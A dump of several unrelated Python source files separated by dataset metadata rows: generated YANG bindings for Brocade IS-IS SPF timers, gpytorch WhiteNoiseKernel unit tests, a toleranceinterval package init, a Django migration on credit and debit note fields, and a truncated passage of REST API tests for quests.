v = v._utype(v)
try:
t = YANGDynClass(v,base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l2_spf_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l2_spf_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l2_spf_timer(self):
self.__l2_spf_timer = YANGDynClass(base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l1_spf6_timer(self):
"""
Getter method for l1_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf6_timer (container)
"""
return self.__l1_spf6_timer
def _set_l1_spf6_timer(self, v, load=False):
"""
Setter method for l1_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf6_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l1_spf6_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l1_spf6_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l1_spf6_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l1_spf6_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l1_spf6_timer(self):
self.__l1_spf6_timer = YANGDynClass(base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l2_spf6_timer(self):
"""
Getter method for l2_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf6_timer (container)
"""
return self.__l2_spf6_timer
def _set_l2_spf6_timer(self, v, load=False):
"""
Setter method for l2_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf6_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l2_spf6_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l2_spf6_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l2_spf6_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l2_spf6_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l2_spf6_timer(self):
self.__l2_spf6_timer = YANGDynClass(base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_pspf_timer(self):
"""
Getter method for pspf_timer, mapped from YANG variable /isis_state/router_isis_config/pspf_timer (container)
"""
return self.__pspf_timer
def _set_pspf_timer(self, v, load=False):
"""
Setter method for pspf_timer, mapped from YANG variable /isis_state/router_isis_config/pspf_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_pspf_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pspf_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """pspf_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__pspf_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_pspf_timer(self):
self.__pspf_timer = YANGDynClass(base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_pspf6_timer(self):
"""
Getter method for pspf6_timer, mapped from YANG variable /isis_state/router_isis_config/pspf6_timer (container)
"""
return self.__pspf6_timer
def _set_pspf6_timer(self, v, load=False):
"""
Setter method for pspf6_timer, mapped from YANG variable /isis_state/router_isis_config/pspf6_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_pspf6_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pspf6_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """pspf6_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__pspf6_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_pspf6_timer(self):
self.__pspf6_timer = YANGDynClass(base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
nsr_state = __builtin__.property(_get_nsr_state)
lsp_flood_count = __builtin__.property(_get_lsp_flood_count)
lsp_fast_flood_count = __builtin__.property(_get_lsp_fast_flood_count)
fast_flood_wait_count = __builtin__.property(_get_fast_flood_wait_count)
hello_padding = __builtin__.property(_get_hello_padding)
hello_padding_ptp = __builtin__.property(_get_hello_padding_ptp)
csnp_interval = __builtin__.property(_get_csnp_interval)
lsp_gen_interval = __builtin__.property(_get_lsp_gen_interval)
lsp_interval = __builtin__.property(_get_lsp_interval)
lsp_refresh_interval = __builtin__.property(_get_lsp_refresh_interval)
lsp_lifetime = __builtin__.property(_get_lsp_lifetime)
retransmit_interval = __builtin__.property(_get_retransmit_interval)
pspf_enabled = __builtin__.property(_get_pspf_enabled)
ispf_enabled = __builtin__.property(_get_ispf_enabled)
istct_spf_enabled = __builtin__.property(_get_istct_spf_enabled)
overload_state = __builtin__.property(_get_overload_state)
overload_startup_time = __builtin__.property(_get_overload_startup_time)
overload_wait_on_bgp = __builtin__.property(_get_overload_wait_on_bgp)
overload_bgp_wait_time = __builtin__.property(_get_overload_bgp_wait_time)
enable_code_assertions = __builtin__.property(_get_enable_code_assertions)
graceful_restart_helper = __builtin__.property(_get_graceful_restart_helper)
isis_hostname_enabled = __builtin__.property(_get_isis_hostname_enabled)
isis_system_info = __builtin__.property(_get_isis_system_info)
log_handler = __builtin__.property(_get_log_handler)
is_address_family_v4 = __builtin__.property(_get_is_address_family_v4)
is_address_family_v6 = __builtin__.property(_get_is_address_family_v6)
reverse_metric = __builtin__.property(_get_reverse_metric)
debug_handler = __builtin__.property(_get_debug_handler)
l1_auth_profile = __builtin__.property(_get_l1_auth_profile)
l2_auth_profile = __builtin__.property(_get_l2_auth_profile)
l1_spf_timer = __builtin__.property(_get_l1_spf_timer)
l2_spf_timer = __builtin__.property(_get_l2_spf_timer)
l1_spf6_timer = __builtin__.property(_get_l1_spf6_timer)
l2_spf6_timer = __builtin__.property(_get_l2_spf6_timer)
pspf_timer = __builtin__.property(_get_pspf_timer)
pspf6_timer = __builtin__.property(_get_pspf6_timer)
_pyangbind_elements = {'nsr_state': nsr_state, 'lsp_flood_count': lsp_flood_count, 'lsp_fast_flood_count': lsp_fast_flood_count, 'fast_flood_wait_count': fast_flood_wait_count, 'hello_padding': hello_padding, 'hello_padding_ptp': hello_padding_ptp, 'csnp_interval': csnp_interval, 'lsp_gen_interval': lsp_gen_interval, 'lsp_interval': lsp_interval, 'lsp_refresh_interval': lsp_refresh_interval, 'lsp_lifetime': lsp_lifetime, 'retransmit_interval': retransmit_interval, 'pspf_enabled': pspf_enabled, 'ispf_enabled': ispf_enabled, 'istct_spf_enabled': istct_spf_enabled, 'overload_state': overload_state, 'overload_startup_time': overload_startup_time, 'overload_wait_on_bgp': overload_wait_on_bgp, 'overload_bgp_wait_time': overload_bgp_wait_time, 'enable_code_assertions': enable_code_assertions, 'graceful_restart_helper': graceful_restart_helper, 'isis_hostname_enabled': isis_hostname_enabled, 'isis_system_info': isis_system_info, 'log_handler': log_handler, 'is_address_family_v4': is_address_family_v4, 'is_address_family_v6': is_address_family_v6, 'reverse_metric': reverse_metric, 'debug_handler': debug_handler, 'l1_auth_profile': l1_auth_profile, 'l2_auth_profile': l2_auth_profile, 'l1_spf_timer': l1_spf_timer, 'l2_spf_timer': l2_spf_timer, 'l1_spf6_timer': l1_spf6_timer, 'l2_spf6_timer': l2_spf6_timer, 'pspf_timer': pspf_timer, 'pspf6_timer': pspf6_timer, }
| 83.139566
| 1,374
| 0.738408
| 16,609
| 122,714
| 5.171172
| 0.017581
| 0.035162
| 0.076844
| 0.047271
| 0.946814
| 0.923424
| 0.907647
| 0.891405
| 0.878866
| 0.86926
| 0
| 0.011036
| 0.134598
| 122,714
| 1,475
| 1,375
| 83.195932
| 0.797725
| 0.172882
| 0
| 0.521197
| 0
| 0.044888
| 0.397938
| 0.233172
| 0
| 0
| 0
| 0
| 0.016209
| 1
| 0.138404
| false
| 0
| 0.027431
| 0
| 0.269327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7b69cd79b124a9cd4c4002ea25d159d9f1b9b9d
| 3,139
|
py
|
Python
|
test/kernels/test_white_noise_kernel.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | 2
|
2019-03-31T04:36:30.000Z
|
2019-05-22T20:09:25.000Z
|
test/kernels/test_white_noise_kernel.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | null | null | null |
test/kernels/test_white_noise_kernel.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | 1
|
2019-02-15T17:05:42.000Z
|
2019-02-15T17:05:42.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
import unittest
from gpytorch.kernels import WhiteNoiseKernel
class TestWhiteNoiseKernel(unittest.TestCase):
def test_computes_diag_train(self):
a = torch.tensor([4, 2, 8], dtype=torch.float).view(3, 1)
variances = torch.randn(3)
kernel = WhiteNoiseKernel(variances=variances)
actual = torch.diag(variances)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
def test_computes_diag_train_batch(self):
a = torch.tensor([[4, 2, 8], [4, 2, 8]], dtype=torch.float).view(2, 3, 1)
variances = torch.randn(2, 3, 1)
kernel = WhiteNoiseKernel(variances=variances)
actual = torch.cat(
(torch.diag(variances[0].squeeze(-1)).unsqueeze(0), torch.diag(variances[1].squeeze(-1)).unsqueeze(0))
)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
def test_computes_zero_eval(self):
a = torch.tensor([4, 2, 8], dtype=torch.float).view(3, 1)
b = torch.tensor([3, 7], dtype=torch.float).view(2, 1)
variances = torch.randn(3)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual_one = torch.zeros(3, 2)
actual_two = torch.zeros(2, 3)
res_one = kernel(a, b).evaluate()
res_two = kernel(b, a).evaluate()
self.assertLess(torch.norm(res_one - actual_one), 1e-5)
self.assertLess(torch.norm(res_two - actual_two), 1e-5)
def test_computes_zero_eval_batch(self):
a = torch.tensor([[4, 2, 8], [4, 2, 8]], dtype=torch.float).view(2, 3, 1)
b = torch.tensor([[3, 7], [3, 7]], dtype=torch.float).view(2, 2, 1)
variances = torch.randn(2, 3, 1)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual_one = torch.zeros(3, 2)
actual_two = torch.zeros(2, 3)
res_one = kernel(a, b).evaluate()
res_two = kernel(b, a).evaluate()
self.assertLess(torch.norm(res_one - actual_one), 1e-5)
self.assertLess(torch.norm(res_two - actual_two), 1e-5)
def test_computes_diag_eval(self):
a = torch.tensor([4, 2, 8], dtype=torch.float).view(3, 1)
variances = torch.randn(3)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual = torch.diag(variances)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
def test_computes_diag_eval_batch(self):
a = torch.tensor([[4, 2, 8], [4, 2, 8]], dtype=torch.float).view(2, 3, 1)
variances = torch.randn(2, 3, 1)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual = torch.cat(
(torch.diag(variances[0].squeeze(-1)).unsqueeze(0), torch.diag(variances[1].squeeze(-1)).unsqueeze(0))
)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
if __name__ == "__main__":
unittest.main()
| 39.734177
| 114
| 0.625996
| 429
| 3,139
| 4.431235
| 0.135198
| 0.009469
| 0.014203
| 0.079958
| 0.872173
| 0.856391
| 0.856391
| 0.813256
| 0.813256
| 0.813256
| 0
| 0.041649
| 0.227461
| 3,139
| 78
| 115
| 40.24359
| 0.742268
| 0
| 0
| 0.705882
| 0
| 0
| 0.002549
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 1
| 0.088235
| false
| 0
| 0.102941
| 0
| 0.205882
| 0.014706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4006aacfdb7675b82fbca91bb07843cb2d4dd3de
| 238
|
py
|
Python
|
toleranceinterval/oneside/__init__.py
|
jedludlow/tolerance_interval_py
|
cf3ecd1e2f9b870de3e71bc92e07e6394510c001
|
[
"MIT"
] | 9
|
2021-12-15T22:54:24.000Z
|
2022-03-12T00:25:07.000Z
|
toleranceinterval/oneside/__init__.py
|
jedludlow/tolerance_interval_py
|
cf3ecd1e2f9b870de3e71bc92e07e6394510c001
|
[
"MIT"
] | 5
|
2019-11-07T15:26:21.000Z
|
2022-02-25T19:40:50.000Z
|
toleranceinterval/oneside/__init__.py
|
jedludlow/tolerance_interval_py
|
cf3ecd1e2f9b870de3e71bc92e07e6394510c001
|
[
"MIT"
] | 1
|
2021-03-11T19:28:22.000Z
|
2021-03-11T19:28:22.000Z
|
from .oneside import normal # noqa F401
from .oneside import lognormal # noqa F401
from .oneside import non_parametric # noqa F401
from .oneside import hanson_koopmans # noqa F401
from .oneside import hanson_koopmans_cmh # noqa F401
| 39.666667
| 53
| 0.789916
| 34
| 238
| 5.411765
| 0.352941
| 0.298913
| 0.461957
| 0.413043
| 0.695652
| 0.423913
| 0.423913
| 0
| 0
| 0
| 0
| 0.075758
| 0.168067
| 238
| 5
| 54
| 47.6
| 0.853535
| 0.205882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
40224aa80e75acd91dec9e073cf2e8e458208bb4
| 4,544
|
py
|
Python
|
web/transiq/team/migrations/0111_auto_20180626_1222.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | null | null | null |
web/transiq/team/migrations/0111_auto_20180626_1222.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | 14
|
2020-06-05T23:06:45.000Z
|
2022-03-12T00:00:18.000Z
|
web/transiq/team/migrations/0111_auto_20180626_1222.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.0.5 on 2018-06-26 12:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('team', '0110_auto_20180622_1506'),
]
operations = [
migrations.AlterField(
model_name='creditnotecustomer',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='credit_note_customer_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='creditnotecustomerdirectadvance',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='credit_note_customer_advance_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='creditnotecustomerdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='creditnotesupplier',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='credit_note_supplier_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotecustomer',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='debit_note_customer_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotesupplier',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='debit_note_supplier_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotesupplier',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='debitnotesupplierdirectadvance',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='debit_note_supplier_advance_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotesupplierdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='historicalcreditnotecustomerdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='historicaldebitnotesupplier',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='historicaldebitnotesupplierdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
]
| 59.789474
| 235
| 0.663292
| 461
| 4,544
| 6.331887
| 0.167028
| 0.08222
| 0.102775
| 0.119219
| 0.865365
| 0.865365
| 0.84481
| 0.84481
| 0.84481
| 0.84481
| 0
| 0.011704
| 0.191461
| 4,544
| 75
| 236
| 60.586667
| 0.782798
| 0.009903
| 0
| 0.695652
| 1
| 0
| 0.306204
| 0.101846
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4024f9f27cbd2308812278c31cfa81102a8d9c7c
| 28,666
|
py
|
Python
|
tests/api_tests/test_quests.py
|
LaudateCorpus1/hermes-11
|
36e5c0532571eed42d5f6edea35f755b837a5b2d
|
[
"Apache-2.0"
] | 60
|
2015-05-25T06:02:41.000Z
|
2021-09-24T22:11:21.000Z
|
tests/api_tests/test_quests.py
|
dropbox/hermes
|
36e5c0532571eed42d5f6edea35f755b837a5b2d
|
[
"Apache-2.0"
] | 42
|
2015-06-16T06:31:01.000Z
|
2017-09-01T18:28:30.000Z
|
tests/api_tests/test_quests.py
|
LaudateCorpus1/hermes-11
|
36e5c0532571eed42d5f6edea35f755b837a5b2d
|
[
"Apache-2.0"
] | 16
|
2015-05-24T02:34:06.000Z
|
2021-08-21T08:13:12.000Z
|
import json
import pytest
import requests
import logging
from .fixtures import tornado_server, tornado_app, sample_data1_server
from datetime import datetime, timedelta
from .util import (
assert_error, assert_success, assert_created, assert_deleted, Client
)
def test_malformed(sample_data1_server):
client = sample_data1_server
assert_error(client.post("/quests", data="Non-JSON"), 400)
def test_creation(sample_data1_server):
client = sample_data1_server
# We start with 2 events in the test data
assert_success(
client.get("/events"),
{
"events": [{"eventTypeId": 1,
"hostId": 1,
"id": 1,
"note": "example needs a reboot",
"user": "system@example.com"},
{"eventTypeId": 2,
"hostId": 1,
"id": 2,
"note": "example needs a rebooted",
"user": "system@example.com"}],
"limit": 10,
"offset": 0,
"totalEvents": 2
},
strip=["timestamp"]
)
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
# We create a quest with a target time 7 days from today
target_time = datetime.utcnow() + timedelta(days=7)
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
targetTime=str(target_time),
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 1
},
strip=["quests"]
)
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "johnny@example.com",
"targetTime": str(target_time),
"description": "This is a quest almighty",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 5
},
strip=["events"]
)
def test_update(sample_data1_server):
client = sample_data1_server
target_time = datetime.utcnow() + timedelta(days=7)
target_time2 = datetime.utcnow() + timedelta(days=12)
# Create a quest
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
targetTime=str(target_time),
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
# Update the creator of the quest
assert_success(
client.update(
"/quests/1",
creator="betsy@example.com"
),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "This is a quest almighty",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify the creator has changed
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "This is a quest almighty",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Update the description
assert_success(
client.update(
"/quests/1",
description="New desc"
),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "New desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify the new description
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "New desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Update both creator and description
assert_success(
client.update(
"/quests/1",
description="Newer desc",
creator="tommy@example.com"
),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify both creator and description have updated
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Update the target time
assert_success(
client.update(
"/quests/1",
targetTime=str(target_time2)
),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time2),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify target time updated
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time2),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
def test_quest_lifecycle(sample_data1_server, caplog):
caplog.setLevel(logging.INFO)
client = sample_data1_server
# We start with 2 events in the test data
assert_success(
client.get("/events"),
{
"events": [{"eventTypeId": 1,
"hostId": 1,
"id": 1,
"note": "example needs a reboot",
"user": "system@example.com"},
{"eventTypeId": 2,
"hostId": 1,
"id": 2,
"note": "example needs a rebooted",
